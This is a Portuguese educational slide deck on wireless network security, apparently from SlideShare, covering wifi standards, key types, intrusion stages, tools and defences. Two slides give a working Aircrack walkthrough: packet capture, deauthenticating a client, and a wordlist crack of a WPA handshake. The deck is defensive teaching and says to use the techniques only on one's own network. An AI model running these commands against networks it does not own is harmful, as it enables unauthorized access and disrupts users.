SEGURANÇA EM REDESSEM FIOTudo que você precisa saber para proteger a sua redeDaniel ArcelinoJoselino SantosFábioMarinho
TÓPICOS• Introdução• Tecnologias das redes sem fio• Prejuízos pós-invasão• Tipos de chaves• Etapas da invasão• Ferramentas...
INTRODUÇÃO• Usamos o termo wireless para descrever redes sem fio• O mundo ultrapassará 7 bilhões de dispositivos móveis em...
TECNOLOGIASInfravermelhoWi-fi (Wireless Fidelity)Bluetooth (Cada vez mais presente em celulares e Notebooks)3GWimax (Banda...
REDE SEM FIO
DESVANTAGENS• A maioria dos pontos de acesso usam antenas baratas reduzindo oalcance• O sinal pode ser capturado por uma a...
PREJUÍZOS PÓS-INVASÃO• Uso indevido e desautorizado da rede• Acesso desautorizado a dados e roubo de informações• Divulgaç...
TIPOS DE CHAVES• WEP• Fácil de quebrar• WPA• Chaves dinâmicas• Verificação de usuários• Criptografia forte (AES)• WPA 2• EAP
ETAPAS DA INVASÃO• Localização da rede• Coleta de informações• Varredura• Quebra da senha• Deleção dos rastros
O QUE É NECESSÁRIOEquipamento Interface Wi-fi• PC Desktop• Notebook• Smartphone• Placa de rede wi-fi• Adaptador USB para w...
O QUE É NECESSÁRIO• Kismet• Usado para checar a segurança da rede• Checar a presença de outras redes próximas• Invadir red...
MECANISMOS DE DEFESA• Encriptar toda a transmissão com WPA 2• Senhas fortes• Exemplo: S39uRan$43WrEd3$$3wF!0• Lista de end...
ADVERTÊNCIAS• Utilize as técnicas aqui descritas apenas para garantir a segurançada sua rede• Existem diversas leis que pu...
TESTE PRÁTICO AIRCRACK• Sistema: Distribuição Backtrack 5• Hardware: Netbook Asus com Intel Celeron 900 Mhz, 1GB de RAM• F...
TESTE PRÁTICO AIRCRACK#aircrack-ng -e GVT -w wordListBrasil.txt /var/gvt-01.capSSIDWord list encontrados facilmentena inte...
CONCLUSÃO• A tendência das redes sem fio é cada vez maior• Não existe rede 100% segura• Novas tecnologias são criadas e co...
REFERÊNCIASMURILO NELSON Ataques à redes sem fio. disponivel em 05/10/2004TI Safe Segurança em redes sem fio. disponivel e...
Próximos SlideShares
Carregando em…5
×

Segurança em redes sem fio 2

2.255 visualizações

Publicada em

0 comentários
0 gostaram
Estatísticas
Notas
  • Seja o primeiro a comentar

  • Seja a primeira pessoa a gostar disto

Sem downloads
Visualizações
Visualizações totais
2.255
No SlideShare
0
A partir de incorporações
0
Número de incorporações
2
Ações
Compartilhamentos
0
Downloads
109
Comentários
0
Gostaram
0
Incorporações 0
Nenhuma incorporação

Nenhuma nota no slide

Segurança em redes sem fio 2

  1. 1. SEGURANÇA EM REDESSEM FIOTudo que você precisa saber para proteger a sua redeDaniel ArcelinoJoselino SantosFábioMarinho
  2. 2. TÓPICOS• Introdução• Tecnologias das redes sem fio• Prejuízos pós-invasão• Tipos de chaves• Etapas da invasão• Ferramentas utilizadas na invasão• Mecanismos de defesa• Advertências• Conclusão• Referências
  3. 3. INTRODUÇÃO• Usamos o termo wireless para descrever redes sem fio• O mundo ultrapassará 7 bilhões de dispositivos móveis em 2013• Redes sem fio oferecem mobilidade, praticidade e flexibilidade• A maioria dos modems ADSL atuais possuem roteador sem fio• O roteador que disponibiliza a rede sem fio através de uma antenachama-se Acces point ou ponto de acesso• Atualmente é possível transformar até mesmo um smartphone emum Roteador sem fio com o recurso ancorar
  4. 4. TECNOLOGIASInfravermelhoWi-fi (Wireless Fidelity)Bluetooth (Cada vez mais presente em celulares e Notebooks)3GWimax (Banda larga sem fio)As normas são definidas pelo protocolo 802.11Disponível nos padrões:Padrão Velocidade802.11b 11 Mb802.11a 54 Mb802.11n 11 - 54 Mb802.11g 54 Mb
  5. 5. REDE SEM FIO
  6. 6. DESVANTAGENS• A maioria dos pontos de acesso usam antenas baratas reduzindo oalcance• O sinal pode ser capturado por uma antena de maior alcance• Não há formas de impedir que o sinal se propague livremente• Velocidade limitada de acordo com o ambiente
  7. 7. PREJUÍZOS PÓS-INVASÃO• Uso indevido e desautorizado da rede• Acesso desautorizado a dados e roubo de informações• Divulgação de informação confidencial• Interrupção de serviço• Implicações legais• Utilização de banda• Uso da rede invadida como fonte de bots• Envio de spam• Download de software ilegal• Difusão de pirataria• Disseminação de vírus, spyware e trojans etc.
  8. 8. TIPOS DE CHAVES• WEP• Fácil de quebrar• WPA• Chaves dinâmicas• Verificação de usuários• Criptografia forte (AES)• WPA 2• EAP
  9. 9. ETAPAS DA INVASÃO• Localização da rede• Coleta de informações• Varredura• Quebra da senha• Deleção dos rastros
  10. 10. O QUE É NECESSÁRIOEquipamento Interface Wi-fi• PC Desktop• Notebook• Smartphone• Placa de rede wi-fi• Adaptador USB para wireless ou blutooth• Cartão PCMCIA• Interface iterna• Antena de longo alcance
  11. 11. O QUE É NECESSÁRIO• Kismet• Usado para checar a segurança da rede• Checar a presença de outras redes próximas• Invadir redes• Modo monitor indetectável• Aircrack• O melhor software para varredura e quebra de redes sem fio• Possui todas as ferramentas necessárias para a invasão• Ferramentas airodump-ng, aircrack, aireplay-ng• Airsnort• Distribuição Backtrack• Uma distribuição Linux completa para testar a segurança da rede e praticar
  12. 12. MECANISMOS DE DEFESA• Encriptar toda a transmissão com WPA 2• Senhas fortes• Exemplo: S39uRan$43WrEd3$$3wF!0• Lista de endereços MAC autorizados ao acesso• Desativar o SSID• Trocar a senha padrão do roteador ou access point• Desabilitar os compartilhamentos desnecessários• Use um Firewall seguro e bem configurado• Monitoramento eficiente• Exemplos: Nmap
  13. 13. ADVERTÊNCIAS• Utilize as técnicas aqui descritas apenas para garantir a segurançada sua rede• Existem diversas leis que punem os crimes de violação de dadose de privacidade, etc• Nosso grupo não se responsabiliza pelo mal uso das técnicas aquidescritas• Com o conhecimento vem a responsabilidade
  14. 14. TESTE PRÁTICO AIRCRACK• Sistema: Distribuição Backtrack 5• Hardware: Netbook Asus com Intel Celeron 900 Mhz, 1GB de RAM• Ferramenta: Aircrack#airodump-ng wlan0#airodump-ng wlan0 –-bssid 00:6B:CC:48:D3:f7 –-channel 6#airodump-ng wlan0 –w pacotes_rede –-bssid00:6B:CC:48:D3:f7 –-channel 6#aireplay-ng –deauth 1 wlan0 –a 00:6B:CC:48:D3:f7 –c64:7f:yt:35:j9:w8InterfaceAPQuantidade de estações desautenticadas AP Estação
  15. 15. TESTE PRÁTICO AIRCRACK#aircrack-ng -e GVT -w wordListBrasil.txt /var/gvt-01.capSSIDWord list encontrados facilmentena internetPacotes capturados pelo airodump
  16. 16. CONCLUSÃO• A tendência das redes sem fio é cada vez maior• Não existe rede 100% segura• Novas tecnologias são criadas e consequentemente novos métodosde burlá-las
  17. 17. REFERÊNCIASMURILO NELSON Ataques à redes sem fio. disponivel em 05/10/2004TI Safe Segurança em redes sem fio. disponivel em Março de 2010MARCO AURÉLIO THOMPSON Curso de hacker.CARLOS E. MORIMOTO Redes guia prático. 2.ed Porto Alegre, SulEditores 2011

×